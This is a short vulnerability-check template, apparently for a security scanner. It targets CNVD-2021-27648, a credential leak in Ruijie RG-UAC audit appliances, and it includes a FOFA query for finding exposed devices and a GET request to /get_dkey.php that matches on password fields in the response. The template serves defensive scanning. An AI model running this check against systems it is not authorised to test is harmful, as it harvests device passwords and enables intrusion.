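Vulnerability description
The Ruijie RG-UAC unified internet behavior management and audit system has an information disclosure vulnerability that an attacker can exploit to obtain sensitive information.
fofa: title="RG-UAC登录页面"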
id: CNVD-2021-27648
info:
  name: Ruijie RG-UAC Information Leakage Vulnerability
  author: doinb1517
  severity: critical
  verified: true
  description: |-
    锐捷RG-UAC锐捷统一上网行为管理与审计系统存在信息泄露漏洞,攻击者可利用该漏洞获取敏感信息。
    fofa: title="RG-UAC登录页面"
  reference:
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-27648
  tags: cnvd,cnvd2021,ruijie,leakage
  created: 2023/07/07
rules:
  r0:
    request:
      method: GET
      path: /get_dkey.php
    expression: |
      response.status == 200 &&
      response.body.bcontains(b'"password":') &&
      response.body.bcontains(b'"pre_define":') &&
      response.body.bcontains(b'"auth_method":') &&
      response.body.bcontains(b'"dkey_password":')
expression: r0()